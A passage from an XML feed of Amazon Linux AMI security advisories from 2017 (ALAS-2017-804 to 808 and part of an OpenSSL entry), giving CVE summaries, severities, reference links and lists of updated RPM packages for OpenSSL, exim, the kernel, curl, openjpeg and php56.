14:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-3731:
An integer underflow leading to an out of bounds read flaw was found in OpenSSL. A remote attacker could possibly use this flaw to crash a 32-bit TLS/SSL server or client using OpenSSL if it used the RC4-MD5 cipher suite.
1416852:
CVE-2017-3731 openssl: Truncated packet could crash via OOB read
CVE-2016-8610:
A denial of service flaw was found in the way the TLS/SSL protocol defined processing of ALERT packets during a connection handshake. A remote attacker could use this flaw to make a TLS/SSL server consume an excessive amount of CPU and fail to accept connections from other clients.
1384743:
CVE-2016-8610 SSL/TLS: Malformed plain-text ALERT packets could cause remote DoS
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8610" title="" id="CVE-2016-8610" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3731" title="" id="CVE-2017-3731" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-perl" version="1.0.1k" release="15.99.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.1k-15.99.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1k" release="15.99.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.1k-15.99.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.1k" release="15.99.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.1k-15.99.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.1k" release="15.99.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.1k-15.99.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.1k" release="15.99.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.1k-15.99.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1k" release="15.99.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.1k-15.99.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.1k" release="15.99.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.1k-15.99.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.1k" release="15.99.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.1k-15.99.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.1k" release="15.99.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.1k-15.99.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.1k" release="15.99.amzn1" epoch="1" 
arch="i686"><filename>Packages/openssl-devel-1.0.1k-15.99.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-804</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-804: medium priority package update for exim</title><issued date="2017-03-06 14:00:00" /><updated date="2017-03-06 14:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-9963:
It was found that Exim leaked DKIM signing private keys to the &quot;mainlog&quot; log file. As a result, an attacker with access to system log files could potentially access these leaked DKIM private keys.
1405322:
CVE-2016-9963 exim: Possible information disclosure to remote attacker
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9963" title="" id="CVE-2016-9963" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="exim-pgsql" version="4.88" release="2.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-pgsql-4.88-2.11.amzn1.x86_64.rpm</filename></package><package name="exim-mon" version="4.88" release="2.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mon-4.88-2.11.amzn1.x86_64.rpm</filename></package><package name="exim-debuginfo" version="4.88" release="2.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-debuginfo-4.88-2.11.amzn1.x86_64.rpm</filename></package><package name="exim-mysql" version="4.88" release="2.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mysql-4.88-2.11.amzn1.x86_64.rpm</filename></package><package name="exim" version="4.88" release="2.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-4.88-2.11.amzn1.x86_64.rpm</filename></package><package name="exim-greylist" version="4.88" release="2.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-greylist-4.88-2.11.amzn1.x86_64.rpm</filename></package><package name="exim" version="4.88" release="2.11.amzn1" epoch="0" arch="i686"><filename>Packages/exim-4.88-2.11.amzn1.i686.rpm</filename></package><package name="exim-mon" version="4.88" release="2.11.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mon-4.88-2.11.amzn1.i686.rpm</filename></package><package name="exim-mysql" version="4.88" release="2.11.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mysql-4.88-2.11.amzn1.i686.rpm</filename></package><package name="exim-pgsql" version="4.88" release="2.11.amzn1" epoch="0" arch="i686"><filename>Packages/exim-pgsql-4.88-2.11.amzn1.i686.rpm</filename></package><package name="exim-debuginfo" version="4.88" release="2.11.amzn1" epoch="0" 
arch="i686"><filename>Packages/exim-debuginfo-4.88-2.11.amzn1.i686.rpm</filename></package><package name="exim-greylist" version="4.88" release="2.11.amzn1" epoch="0" arch="i686"><filename>Packages/exim-greylist-4.88-2.11.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-805</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-805: important priority package update for kernel</title><issued date="2017-03-06 14:00:00" /><updated date="2017-06-07 21:47:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-6214:
A flaw was found in the Linux kernel&#039;s handling of packets with the URG flag. Applications using the splice() and tcp_splice_read() functionality can allow a remote attacker to force the kernel to enter a condition in which it can loop indefinitely.
1426542:
CVE-2017-6214 kernel: ipv4/tcp: Infinite loop in tcp_splice_read()
CVE-2017-6074:
A use-after-free flaw was found in the way the Linux kernel&#039;s Datagram Congestion Control Protocol (DCCP) implementation freed SKB (socket buffer) resources for a DCCP_PKT_REQUEST packet when the IPV6_RECVPKTINFO option is set on the socket. A local, unprivileged user could use this flaw to alter the kernel memory, allowing them to escalate their privileges on the system.
1423071:
CVE-2017-6074 kernel: use after free in dccp protocol
CVE-2017-5986:
It was reported that, with a Linux kernel earlier than version v4.10-rc8, an application may trigger a BUG_ON in sctp_wait_for_sndbuf if the socket tx buffer is full, a thread is waiting on it to queue more data, and meanwhile another thread peels off the association being used by the first thread.
1420276:
CVE-2017-5986 kernel: Reachable BUG_ON from userspace in sctp_wait_for_sndbuf
CVE-2017-5970:
A vulnerability was found in the Linux kernel where having malicious IP options present would cause the ipv4_pktinfo_prepare() function to drop/free the dst. This could result in a system crash or possible privilege escalation.
1421638:
CVE-2017-5970 kernel: ipv4: Invalid IP options could cause skb->dst drop
CVE-2017-5897:
An issue was found in the Linux kernel ipv6 implementation of GRE tunnels which allows a remote attacker to trigger an out-of-bounds access. At this time we understand no trust barrier has been crossed and there are no security implications in this flaw.
1419848:
CVE-2017-5897 kernel: ip6_gre: Invalid reads in ip6gre_err
CVE-2017-5551:
A vulnerability was found in the Linux kernel in the &#039;tmpfs&#039; file system. When file permissions are modified via &#039;chmod&#039; and the user is not in the owning group or capable of CAP_FSETID, the setgid bit is cleared in inode_change_ok(). Setting a POSIX ACL via &#039;setxattr&#039; sets the file permissions as well as the new ACL, but doesn&#039;t clear the setgid bit in a similar way; this allows bypassing the check in &#039;chmod&#039;.
1416126:
CVE-2017-5551 kernel: S_ISGID is not cleared when setting posix ACLs in tmpfs (CVE-2016-7097 incomplete fix)
CVE-2016-7097:
A vulnerability was found in the Linux kernel. When file permissions are modified via chmod and the user is not in the owning group or capable of CAP_FSETID, the setgid bit is cleared in inode_change_ok(). Setting a POSIX ACL via setxattr sets the file permissions as well as the new ACL, but doesn&#039;t clear the setgid bit in a similar way; this allows bypassing the check in chmod.
1368938:
CVE-2016-7097 kernel: Setting a POSIX ACL via setxattr doesn't clear the setgid bit
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7097" title="" id="CVE-2016-7097" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5551" title="" id="CVE-2017-5551" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5897" title="" id="CVE-2017-5897" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5970" title="" id="CVE-2017-5970" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5986" title="" id="CVE-2017-5986" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6074" title="" id="CVE-2017-6074" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6214" title="" id="CVE-2017-6214" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo-common-x86_64" version="4.4.51" release="40.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.4.51-40.58.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.4.51" release="40.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.4.51-40.58.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.4.51" release="40.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.4.51-40.58.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.4.51" release="40.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.4.51-40.58.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.4.51" release="40.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.4.51-40.58.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.51" release="40.58.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.4.51-40.58.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.4.51" release="40.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.4.51-40.58.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.4.51" release="40.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.4.51-40.58.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.4.51" release="40.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.4.51-40.58.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.4.51" release="40.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.4.51-40.58.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.4.51" release="40.58.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.4.51-40.58.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.4.51" release="40.58.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.4.51-40.58.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.4.51" release="40.58.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.4.51-40.58.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.4.51" release="40.58.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.4.51-40.58.amzn1.i686.rpm</filename></package><package name="perf" version="4.4.51" release="40.58.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.4.51-40.58.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.51" release="40.58.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.4.51-40.58.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.4.51" release="40.58.amzn1" epoch="0" 
arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.4.51-40.58.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.4.51" release="40.58.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.4.51-40.58.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.4.51" release="40.58.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.4.51-40.58.amzn1.i686.rpm</filename></package><package name="kernel" version="4.4.51" release="40.58.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.4.51-40.58.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.4.51" release="40.58.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.4.51-40.58.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-806</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-806: low priority package update for curl</title><issued date="2017-03-22 16:00:00" /><updated date="2017-03-22 16:00:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-9586:
1406712:
CVE-2016-9586 curl: printf floating point buffer overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9586" title="" id="CVE-2016-9586" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="curl-debuginfo" version="7.47.1" release="9.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.47.1-9.70.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.47.1" release="9.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.47.1-9.70.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.47.1" release="9.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.47.1-9.70.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.47.1" release="9.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.47.1-9.70.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.47.1" release="9.70.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.47.1-9.70.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.47.1" release="9.70.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.47.1-9.70.amzn1.i686.rpm</filename></package><package name="curl-debuginfo" version="7.47.1" release="9.70.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.47.1-9.70.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.47.1" release="9.70.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.47.1-9.70.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-807</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-807: medium priority package update for openjpeg</title><issued date="2017-03-22 16:00:00" /><updated date="2017-03-22 16:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that 
fix the following vulnerabilities:
CVE-2016-9675:
A vulnerability was found in the patch for CVE-2013-6045 for OpenJPEG. A specially crafted JPEG2000 image, when read by an application using OpenJPEG, could cause heap-based buffer overflows leading to a crash or possible code execution.
1382202:
CVE-2016-9675 openjpeg: incorrect fix for CVE-2013-6045
CVE-2016-7163:
An integer overflow, leading to a heap buffer overflow, was found in OpenJPEG. An attacker could create a crafted JPEG2000 image that, when loaded by an application using openjpeg, could lead to a crash or, potentially, code execution.
1374329:
CVE-2016-7163 openjpeg: Integer overflow in opj_pi_create_decode
CVE-2016-5159:
An integer overflow, leading to a heap buffer overflow, was found in openjpeg, also affecting the PDF viewer in Chromium. A specially crafted JPEG2000 image could cause an incorrect calculation when allocating memory for code blocks, which could lead to a crash, or potentially, code execution.
1372220:
CVE-2016-5159 chromium-browser, openjpeg: heap overflow in parsing of JPEG2000 code blocks
CVE-2016-5158:
An integer overflow, leading to a heap buffer overflow, was found in openjpeg, also affecting the PDF viewer in Chromium. A specially crafted JPEG2000 image could cause incorrect calculations when allocating various data structures, which could lead to a crash, or potentially, code execution.
1372219:
CVE-2016-5158 chromium-browser, openjpeg: heap overflow due to unsafe use of opj_aligned_malloc
CVE-2016-5139:
An integer overflow, leading to a heap buffer overflow, was found in openjpeg, also affecting the PDF viewer in Chromium. A specially crafted JPEG2000 image could cause an incorrect calculation when allocating precinct data structures, which could lead to a crash, or potentially, code execution.
1363982:
CVE-2016-5139 chromium-browser, openjpeg: Heap overflow in parsing of JPEG2000 precincts
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5139" title="" id="CVE-2016-5139" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5158" title="" id="CVE-2016-5158" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5159" title="" id="CVE-2016-5159" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7163" title="" id="CVE-2016-7163" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9675" title="" id="CVE-2016-9675" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openjpeg-devel" version="1.3" release="16.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/openjpeg-devel-1.3-16.9.amzn1.x86_64.rpm</filename></package><package name="openjpeg-debuginfo" version="1.3" release="16.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/openjpeg-debuginfo-1.3-16.9.amzn1.x86_64.rpm</filename></package><package name="openjpeg-libs" version="1.3" release="16.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/openjpeg-libs-1.3-16.9.amzn1.x86_64.rpm</filename></package><package name="openjpeg" version="1.3" release="16.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/openjpeg-1.3-16.9.amzn1.x86_64.rpm</filename></package><package name="openjpeg-libs" version="1.3" release="16.9.amzn1" epoch="0" arch="i686"><filename>Packages/openjpeg-libs-1.3-16.9.amzn1.i686.rpm</filename></package><package name="openjpeg" version="1.3" release="16.9.amzn1" epoch="0" arch="i686"><filename>Packages/openjpeg-1.3-16.9.amzn1.i686.rpm</filename></package><package name="openjpeg-debuginfo" version="1.3" release="16.9.amzn1" epoch="0" arch="i686"><filename>Packages/openjpeg-debuginfo-1.3-16.9.amzn1.i686.rpm</filename></package><package name="openjpeg-devel" version="1.3" release="16.9.amzn1" epoch="0" 
arch="i686"><filename>Packages/openjpeg-devel-1.3-16.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-808</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-808: medium priority package update for php56</title><issued date="2017-03-28 23:30:00" /><updated date="2017-03-29 22:50:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-10168:
Integer overflow in gd_io.c in the GD Graphics Library (aka libgd) before 2.2.4 allows remote attackers to have unspecified impact via vectors involving the number of horizontal and vertical chunks in an image.
1418986:
CVE-2016-10168 gd: Integer overflow in gd_io.c
CVE-2016-10167:
The gdImageCreateFromGd2Ctx function in gd_gd2.c in the GD Graphics Library (aka libgd) before 2.2.4 allows remote attackers to cause a denial of service (application crash) via a crafted image file.
1418984:
CVE-2016-10167 gd: DoS vulnerability in gdImageCreateFromGd2Ctx()
CVE-2016-10161:
The object_common1 function in ext/standard/var_unserializer.c in PHP before 5.6.30, 7.0.x before 7.0.15, and 7.1.x before 7.1.1 allows remote attackers to cause a denial of service (buffer over-read and application crash) via crafted serialized data that is mishandled in a finish_nested_data call.
1419010:
CVE-2016-10161 php: Out-of-bounds heap read on unserialize in finish_nested_data()
CVE-2016-10160:
Off-by-one error in the phar_parse_pharfile function in ext/phar/phar.c in PHP before 5.6.30 and 7.0.x before 7.0.15 allows remote attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via a crafted PHAR archive with an alias mismatch.
1419018:
CVE-2016-10160 php: Off-by-one error in phar_parse_pharfile when loading crafted phar archive
CVE-2016-10159:
Integer overflow in the phar_parse_pharfile function in ext/phar/phar.c in PHP before 5.6.30 and 7.0.x before 7.0.15 allows remote attackers to cause a denial of service (memory consumption or application crash) via a truncated manifest entry in a PHAR archive.
1419020:
CVE-2016-10159 php: Integer overflow in phar_parse_pharfile
CVE-2016-10158:
It was found that the exif_convert_any_to_int() function in PHP was vulnerable to floating point exceptions when parsing tags in image files. A remote attacker with the ability to upload a malicious image could crash PHP, causing a Denial of Service.
1419015:
CVE-2016-10158 php: Wrong calculation in exif_convert_any_to_int function
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10158" title="" id="CVE-2016-10158" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10159" title="" id="CVE-2016-10159" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10160" title="" id="CVE-2016-10160" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10161" title="" id="CVE-2016-10161" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10167" title="" id="CVE-2016-10167" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10168" title="" id="CVE-2016-10168" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php56-intl" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-intl-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-enchant" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-enchant-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-gmp" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gmp-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mcrypt-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-imap" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-imap-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gd-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56" version="5.6.30" release="1.133.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php56-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-fpm" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-fpm-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-embedded" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-embedded-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xml-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dbg-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-devel" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-devel-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-mbstring" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mbstring-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-snmp" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-snmp-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-dba" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dba-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-tidy-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xmlrpc-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-opcache" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-opcache-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package 
name="php56-bcmath" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-bcmath-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-mssql" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mssql-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-cli-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mysqlnd-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-pdo" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pdo-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-debuginfo" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-debuginfo-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-ldap" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-ldap-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-soap-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-odbc" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-odbc-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-recode" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-recode-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-common" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-common-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.30" release="1.133.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php56-pgsql-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-process-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-pspell" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pspell-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mcrypt-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-cli" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-cli-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-pgsql" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pgsql-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-pdo" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pdo-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-mbstring" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mbstring-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-recode" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-recode-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-embedded" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-embedded-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-soap" version="5.6.30" release="1.133.amzn1" epoch="0" arch="i686"><filename>Packages/php56-soap-5.6.30-1.133.amzn1.i686.rpm</filename></package><package name="php56-gd" version="5.6.30" 
